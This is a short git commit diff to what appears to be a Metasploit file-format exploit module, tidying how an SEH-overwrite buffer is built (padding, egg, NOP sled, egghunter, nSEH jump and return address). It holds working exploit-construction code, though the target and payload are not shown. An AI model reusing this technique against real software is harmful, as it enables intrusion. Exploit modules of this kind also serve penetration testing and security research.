minor changes

This commit is contained in:
Leonardo Botelho 2012-04-15 22:58:58 -03:00
parent 5bb087d9a7
commit fdd8afea88
1 changed files with 2 additions and 2 deletions

View File

@ -79,9 +79,9 @@ class Metasploit3 < Msf::Exploit::Remote
buffer = rand_text_alpha_upper(4066-egg.length)
buffer << egg
buffer << "\x90" * 10
buffer << make_nops(10)
buffer << hunter
buffer << "\xeb\xd8\xff\xff" # nseh
buffer << "\xeb\xd8\xff\xff" # nseh jmp back 40 bytes
buffer << [target.ret].pack('V') # seh
print_status("Creating '#{datastore['FILENAME']}' file ...")